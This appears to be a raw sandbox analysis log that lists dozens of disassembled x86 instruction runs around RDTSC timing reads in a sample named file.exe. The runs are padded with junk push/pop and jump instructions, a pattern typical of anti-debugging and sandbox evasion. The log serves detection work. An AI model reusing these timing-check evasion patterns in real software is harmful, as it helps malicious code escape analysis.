              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82D6FA second address: 82D708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007FE4C1200286h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82D708 second address: 82D72F instructions: 0x00000000 rdtsc 0x00000002 je 00007FE4C10F4F66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FE4C10F4F77h 0x0000000f popad 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82D72F second address: 82D735 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82D735 second address: 82D739 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82DE3B second address: 82DE43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82DE43 second address: 82DE47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82E250 second address: 82E276 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007FE4C1200286h 0x0000000e jmp 00007FE4C1200298h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82E594 second address: 82E5A1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pushad 0x00000008 push esi 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82E5A1 second address: 82E5B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jg 00007FE4C1200286h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82E5B0 second address: 82E5BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82E84F second address: 82E871 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FE4C120029Ah 0x00000008 jmp 00007FE4C1200294h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ecx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 834AC7 second address: 834ADB instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE4C10F4F66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jp 00007FE4C10F4F6Eh 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 833592 second address: 83359C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83359C second address: 8335A6 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FE4C10F4F66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 833C8B second address: 833C8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8344FD second address: 83450D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FE4C10F4F66h 0x0000000a popad 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E813D second address: 7E8150 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FE4C1200288h 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E8150 second address: 7E8175 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push edx 0x00000007 jno 00007FE4C10F4F7Bh 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83F9D4 second address: 83F9DB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83FDA8 second address: 83FDB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83FDB0 second address: 83FDC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4C1200291h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 805CF9 second address: 805D09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007FE4C10F4F68h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8401AE second address: 8401BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007FE4C1200286h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8401BD second address: 8401C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8401C1 second address: 8401CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FE4C1200286h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 840768 second address: 840780 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4C10F4F74h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 840780 second address: 840786 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 840786 second address: 84078C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 84078C second address: 840790 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 840790 second address: 8407A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jns 00007FE4C10F4F66h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8407A4 second address: 8407C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jmp 00007FE4C120028Fh 0x0000000e js 00007FE4C1200292h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8407C4 second address: 8407CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 843C13 second address: 843C27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE4C120028Eh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 843C27 second address: 843C2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 843C2B second address: 843C31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8089C9 second address: 8089CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8089CF second address: 8089D9 instructions: 0x00000000 rdtsc 0x00000002 je 00007FE4C120028Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8089D9 second address: 64F974 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 sub ch, 0000003Bh 0x0000000c push dword ptr [ebp+122D1615h] 0x00000012 xor dword ptr [ebp+122DB696h], ecx 0x00000018 add dword ptr [ebp+122D2664h], esi 0x0000001e call dword ptr [ebp+122D1B95h] 0x00000024 pushad 0x00000025 jmp 00007FE4C10F4F73h 0x0000002a xor eax, eax 0x0000002c pushad 0x0000002d push ecx 0x0000002e mov dword ptr [ebp+122D17ECh], eax 0x00000034 pop edi 0x00000035 add dword ptr [ebp+122D3870h], edi 0x0000003b popad 0x0000003c jbe 00007FE4C10F4F6Ch 0x00000042 mov dword ptr [ebp+122D3870h], edx 0x00000048 mov edx, dword ptr [esp+28h] 0x0000004c jp 00007FE4C10F4F72h 0x00000052 mov dword ptr [ebp+122D2AE8h], eax 0x00000058 pushad 0x00000059 add dword ptr [ebp+122D3870h], eax 0x0000005f popad 0x00000060 mov esi, 0000003Ch 0x00000065 jmp 00007FE4C10F4F6Ch 0x0000006a add esi, dword ptr [esp+24h] 0x0000006e mov dword ptr [ebp+122D17E1h], edx 0x00000074 lodsw 0x00000076 jmp 00007FE4C10F4F75h 0x0000007b add eax, dword ptr [esp+24h] 0x0000007f cld 0x00000080 mov ebx, dword ptr [esp+24h] 0x00000084 jmp 00007FE4C10F4F77h 0x00000089 nop 0x0000008a pushad 0x0000008b jmp 00007FE4C10F4F6Eh 0x00000090 pushad 0x00000091 push eax 0x00000092 push edx 0x00000093 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 808AE0 second address: 808B19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FE4C1200286h 0x0000000a popad 0x0000000b jmp 00007FE4C120028Bh 0x00000010 popad 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 pushad 0x00000016 pushad 0x00000017 jc 00007FE4C1200286h 0x0000001d jne 00007FE4C1200286h 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FE4C120028Dh 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 808B19 second address: 808B36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d js 00007FE4C10F4F66h 0x00000013 popad 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 push eax 0x0000001a push esi 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 808BC4 second address: 808BDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE4C1200297h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 808C6C second address: 808C70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 808C70 second address: 808C76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 808C76 second address: 808C7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 808C7C second address: 808C80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80902E second address: 809033 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8093EC second address: 80940A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 mov dword ptr [esp], eax 0x00000009 sub edx, dword ptr [ebp+122D2A58h] 0x0000000f push 0000001Eh 0x00000011 sub ecx, dword ptr [ebp+122D199Ch] 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push esi 0x0000001b pushad 0x0000001c popad 0x0000001d pop esi 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 809726 second address: 80972D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80972D second address: 80977E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 mov cx, si 0x0000000c lea eax, dword ptr [ebp+1248C283h] 0x00000012 call 00007FE4C120028Dh 0x00000017 pop ecx 0x00000018 call 00007FE4C1200290h 0x0000001d add dx, 8D18h 0x00000022 pop edi 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 pushad 0x00000028 popad 0x00000029 jmp 00007FE4C1200294h 0x0000002e popad 0x0000002f rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80977E second address: 7E813D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FE4C10F4F66h 0x00000009 jmp 00007FE4C10F4F73h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esp], eax 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007FE4C10F4F68h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 0000001Ah 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e push edx 0x0000002f or dword ptr [ebp+122D37D3h], ebx 0x00000035 pop edx 0x00000036 lea eax, dword ptr [ebp+1248C23Fh] 0x0000003c mov dword ptr [ebp+122D2867h], edi 0x00000042 push eax 0x00000043 jno 00007FE4C10F4F82h 0x00000049 mov dword ptr [esp], eax 0x0000004c jnp 00007FE4C10F4F6Ch 0x00000052 mov edi, dword ptr [ebp+122D2B5Ch] 0x00000058 call dword ptr [ebp+122D380Ah] 0x0000005e pushad 0x0000005f push eax 0x00000060 push edx 0x00000061 pushad 0x00000062 popad 0x00000063 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 84408F second address: 844093 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 844093 second address: 8440BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE4C10F4F6Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE4C10F4F74h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8440BD second address: 8440CA instructions: 0x00000000 rdtsc 0x00000002 jne 00007FE4C1200286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8440CA second address: 8440D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 84422E second address: 844233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 844233 second address: 84423D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FE4C10F4F6Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 844395 second address: 8443A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8443A1 second address: 8443A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8473AA second address: 8473B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8473B0 second address: 8473B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 847520 second address: 847524 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 847524 second address: 847528 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 847697 second address: 84769B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 84769B second address: 8476A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 847806 second address: 84780E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 84B3EA second address: 84B3F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 84B3F1 second address: 84B404 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007FE4C1200288h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 84B404 second address: 84B424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007FE4C10F4F66h 0x0000000c popad 0x0000000d jmp 00007FE4C10F4F6Fh 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 84B424 second address: 84B42A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 84B42A second address: 84B42E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7BC9F7 second address: 7BCA02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 84AFBB second address: 84AFCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE4C10F4F6Dh 0x00000009 pop ebx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8518DA second address: 851920 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jo 00007FE4C120028Ah 0x0000000b pushad 0x0000000c popad 0x0000000d push edi 0x0000000e pop edi 0x0000000f jmp 00007FE4C120028Bh 0x00000014 jmp 00007FE4C120028Bh 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f jmp 00007FE4C120028Ch 0x00000024 pop edx 0x00000025 js 00007FE4C120028Eh 0x0000002b jne 00007FE4C1200286h 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 851920 second address: 851930 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE4C10F4F6Ch 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C00BA second address: 7C00C4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FE4C1200286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C00C4 second address: 7C0111 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4C10F4F79h 0x00000007 jmp 00007FE4C10F4F73h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 jmp 00007FE4C10F4F6Eh 0x00000015 jmp 00007FE4C10F4F6Bh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C0111 second address: 7C0126 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007FE4C120028Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C0126 second address: 7C012A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 850088 second address: 85008E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85008E second address: 850097 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 850097 second address: 85009D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85009D second address: 8500BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FE4C10F4F6Eh 0x0000000c jno 00007FE4C10F4F66h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85033C second address: 850353 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FE4C120028Ah 0x0000000a ja 00007FE4C120028Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 850631 second address: 850637 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8507D0 second address: 8507F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FE4C1200286h 0x0000000a popad 0x0000000b jmp 00007FE4C1200291h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8507F2 second address: 850800 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FE4C10F4F66h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 850800 second address: 850808 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 850808 second address: 85080E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85080E second address: 850813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8091DC second address: 8091E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
